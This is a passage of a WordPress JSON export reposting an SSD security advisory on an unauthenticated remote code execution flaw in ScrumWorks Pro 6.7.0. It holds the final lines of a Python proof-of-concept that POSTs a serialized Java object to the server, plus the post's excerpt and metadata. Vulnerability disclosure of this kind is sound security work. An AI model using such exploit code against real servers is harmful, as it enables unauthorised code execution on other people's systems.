class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-51\"><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-53\"><span class=\"crayon-p\"># http request<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-54\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;sending serialized command&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-55\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">httplib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">HTTPConnection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-56\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;POST&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/scrumworks\/UFC-poc-&#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toByteArray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-57\"><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getresponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-58\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-59\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;done&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-60\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0040 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3387\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 22 Aug 2017 05:22:12 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a remote code execution vulnerability found in ScrumWorks Pro version 6.7.0. &#8220;CollabNet ScrumWorks Pro is an Agile Project Management for Developers, Scrum Masters, and Business&#8221;. A trial version can be downloaded from the vendor: https:\/\/www.collab.net\/products\/scrumworks Credit A security researcher from, Siberas, has reported this vulnerability to Beyond Security\u2019s SecuriTeam &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3387\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 ScrumWorks Pro Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-8870","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8870","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8870"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8870\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8870"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8870"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8870"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}